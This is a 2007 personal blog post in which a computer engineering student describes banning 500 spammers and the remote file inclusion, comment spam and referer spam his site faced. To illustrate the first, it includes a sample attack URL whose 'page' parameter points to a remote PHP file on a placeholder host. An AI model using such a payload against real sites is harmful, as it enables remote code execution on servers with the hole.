FilipeFreitas.net » 500 spammers banned already

Skip to search - Accesskey = s

Translate this page

The Author

I'm a Portuguese Computer Engineering student at University of Aveiro.

The Search

search site archives

Random Photo

Feed Me Please

The Goodies

Goodies feed.

The Top Posts

The Categories

The Storage

Click here for an advanced archive

500 spammers banned already

Posted in Internet by FilipeFreitas on the November 25th, 2007

When i first created my site, i was worried about issues like what content to post and how to create it, design choices like where to put that button and which colour. I knew spam was a issue but i didn’t make much of it. This site was created about 5 months ago. Since then i banned 500 spammers.

Until now, i’ve been attacked with 3 kinds of spam:

Remote File Inclusion: the first kind i was attacked with. Spammers where trying to execute remote code on my scripts, specially Gallery. This works like SQL injection attacks, try to make the script fetch some code by providing a link to an input where the script would read to process the request. Luckily, WordPress and Gallery are protected against them (i hope) so i haven’t suffered anything. Solution: ban them all to doom. Here’s an example:

http://www.vulnerable.website.com/index.php?page=archive
http://www.vulnerable.website.com/index.php?page=http://www.site.com/code.php?

Comment spam: if you have a blog and allow comments, well, you’ll get flooded with viagra products (not that you need them of course) and other pharmaceutical crap. They’ll get rather frequent with the number of your pingbacks increasing, increasing the chances your blog will get scanned. Since i installed Akismet (if you use WordPress), it has caught over 300 spam comments. Solution: Akismet..and ban them all to doom.
Referer spam: this one is more recent, and they almost come all from United States (specially Comcast..). Some websites share their site logs or the logs are freely accessible from the web, meaning search engines can access them too and read them as links to the spammer site. Solution: you can use the .htaccess file but i prefer to ban them all to doom.

I like the results so far; Akismet hasn’t failed once, my scripts haven’t been modified and i get to watch spammers get squashed like littles flies on the wall (click the image for fullsize):

I’ve banned a lot of people, over 500. I don’t mind when they’re chinese or koreans, not even americans (i take care not to ban search engines), but i’ve banned a few brazillians which are a large fraction of my audience, but hey, safety first.

Bookmark this post:

0 Comments